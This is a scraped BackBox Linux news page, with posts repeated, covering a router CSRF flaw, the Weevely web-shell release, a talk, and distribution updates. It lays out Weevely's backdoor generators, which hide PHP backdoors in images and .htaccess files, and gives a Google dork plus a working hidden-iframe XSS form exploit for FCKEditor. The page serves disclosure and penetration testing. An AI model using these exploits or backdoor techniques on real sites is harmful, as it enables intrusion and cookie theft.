Emilio Pinna, BackBox community member, discover a high severity vulnerability on the router Telecom ADSL Alice Gate VoIP 2 Plus Wi-Fi.
A huge number of ADSL broadband Italian users are vulnerable to connection wiretapping and phishing. The most widely distribuited italian ADSL router Alice Gate 2 Plus Voip Wi-Fi (AGPF), product by Pirelli and based of openrg middleware software, suffers a CSRF attack that allows an attacker to modify internal router configuration like DNS servers, traffic routing, VoIP configurations, DHCP parameters, etc, of a vulnerable user, leading to completely takeover the user ADSL connection. The technique is also useful to enable hidden feature and telnet/ftp/tftp/web extended admin interface.
Weevely returns with improved stability, usability and with some delicious network features useful during your penetration testing or simple web shell management.
To download it go to official page or simply upgrade your BackBox and start using it reading with a quick tutorial.
New modules
Here’s what new modules you’ll get with 0.7 release:
net.proxy module forwards your HTTP traffic trough remote target machine as a real proxy. First run :net.proxy, then set ‘http://localhost:8080′ as HTTP proxy in your favourite web browser and browse anonymously through target web server.
net.php_proxy module installs a PHP script to browse anonymously through remote target machine.
net.scan module performs port scan from your target web server
file.rm module removes files and directories, also in restricted PHP enviroinments
New network modules are also useful to pivoting to internal hosts unreachable from public networks. Read here for detailed modules description.
Generators
Also, I’ve added new kind of generators modules to generate different kind of backdoors:
generate.php generates an obfuscated and polymorphic PHP backdoor. Is the default generator included in older version too.
generate.img appends polymorphic PHP backdoor to an existing image and creates associated .htaccess to enable its execution as PHP code.
generate.htaccess embed polymorphic PHP backdoor into a valid .htaccess that instruct apache to execute itself as PHP script. Awesome.
Raffaele Forte speaker all’evento organizzato a Roma il 2 Luglio da HTML.it.
Il founder del progetto BackBox Linux interverrà in materia di Sicurezza Applicativa con un talk dal titolo “CMS, Analisi automatica delle vulnerabilità”.
Un CMS vulnerabile può permettere ad un attaccante di prendere il pieno controllo del sito (Blog, Forum, e-commerce, etc.), fornendo la possibilità di modificare i contenuti, creare e rimuovere utenti e nel caso peggiore ottenere persino il controllo del server su cui è installato. Sempre più aziende ed enti istituzionali adottano questi strumenti, ma quali sono i vantaggi e che livello di sicurezza garantiscono gli attuali CMS? Affronteremo queste tematiche servendoci di metodologie e strumenti automatici di verifica delle vulnerabilità.
Maggiori informazioni le trovate sul sito ufficiale dell’evento.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2012-06-22 18:50:592018-10-02 21:29:55Talk @ HTML.it Release Party
Emilio Pinna has recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. In 2009 has been rewrited and fixed with new name CKEditor, but old version is still popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications.
The bugged software was spreaded for more than six years and actually Google counts still more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be:
As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. Form exploit:
After release of BackBox 2.05 we have noticed that the GRUB being corrupted on ISO image of 64 bit version. We would like to inform everyone that the error has been fixed and the new ISO image being uplodaed on our official mirrors. In order to avoid any sort of problem, we would like to invite all users, to download the new ISO image. We would like to also thanks to the community of BackBox users for notification of this error.
Enjoy your BackBox!
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2012-04-29 02:08:042018-10-02 21:31:40GRUB error being fixed on BackBox 64 bit version
The BackBox team is proud to announce the release 2.05 of BackBox Linux. The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit & 64bit) can be downloaded from the following location: https://www.backbox.org/download
Alice Gate AGPF: CSRF reconfiguration vulnerability
/in NewsEmilio Pinna, BackBox community member, discover a high severity vulnerability on the router Telecom ADSL Alice Gate VoIP 2 Plus Wi-Fi.
A huge number of ADSL broadband Italian users are vulnerable to connection wiretapping and phishing. The most widely distribuited italian ADSL router Alice Gate 2 Plus Voip Wi-Fi (AGPF), product by Pirelli and based of openrg middleware software, suffers a CSRF attack that allows an attacker to modify internal router configuration like DNS servers, traffic routing, VoIP configurations, DHCP parameters, etc, of a vulnerable user, leading to completely takeover the user ADSL connection. The technique is also useful to enable hidden feature and telnet/ftp/tftp/web extended admin interface.
More info on official blog.
Weevely v0.7 released!
/in NewsWeevely returns with improved stability, usability and with some delicious network features useful during your penetration testing or simple web shell management.
To download it go to official page or simply upgrade your BackBox and start using it reading with a quick tutorial.
New modules
Here’s what new modules you’ll get with 0.7 release:
New network modules are also useful to pivoting to internal hosts unreachable from public networks. Read here for detailed modules description.
Generators
Also, I’ve added new kind of generators modules to generate different kind of backdoors:
Read here about generators usage.
Talk @ HTML.it Release Party
/in NewsRaffaele Forte speaker all’evento organizzato a Roma il 2 Luglio da HTML.it.
Il founder del progetto BackBox Linux interverrà in materia di Sicurezza Applicativa con un talk dal titolo “CMS, Analisi automatica delle vulnerabilità”.
Un CMS vulnerabile può permettere ad un attaccante di prendere il pieno controllo del sito (Blog, Forum, e-commerce, etc.), fornendo la possibilità di modificare i contenuti, creare e rimuovere utenti e nel caso peggiore ottenere persino il controllo del server su cui è installato. Sempre più aziende ed enti istituzionali adottano questi strumenti, ma quali sono i vantaggi e che livello di sicurezza garantiscono gli attuali CMS? Affronteremo queste tematiche servendoci di metodologie e strumenti automatici di verifica delle vulnerabilità.
Maggiori informazioni le trovate sul sito ufficiale dell’evento.
FCKEditor reflected XSS vulnerability
/in NewsEmilio Pinna has recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. In 2009 has been rewrited and fixed with new name CKEditor, but old version is still popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications.
The bugged software was spreaded for more than six years and actually Google counts still more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be:
inurl:fck_spellerpages/spellerpages/server-scripts/ -”The following variables”
The vulnerability
The reflected XSS is injected through ‘textinputs’ POST parameter array, printed without sanization in line 27:
echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. Form exploit:
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/ spellchecker.php" target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!"); </script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>Have fun!
GRUB error being fixed on BackBox 64 bit version
/in NewsAfter release of BackBox 2.05 we have noticed that the GRUB being corrupted on ISO image of 64 bit version. We would like to inform everyone that the error has been fixed and the new ISO image being uplodaed on our official mirrors. In order to avoid any sort of problem, we would like to invite all users, to download the new ISO image. We would like to also thanks to the community of BackBox users for notification of this error.
Enjoy your BackBox!
BackBox Linux 2.05 released!
/in ReleasesThe BackBox team is proud to announce the release 2.05 of BackBox Linux. The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit & 64bit) can be downloaded from the following location: https://www.backbox.org/download
What’s new
System requirements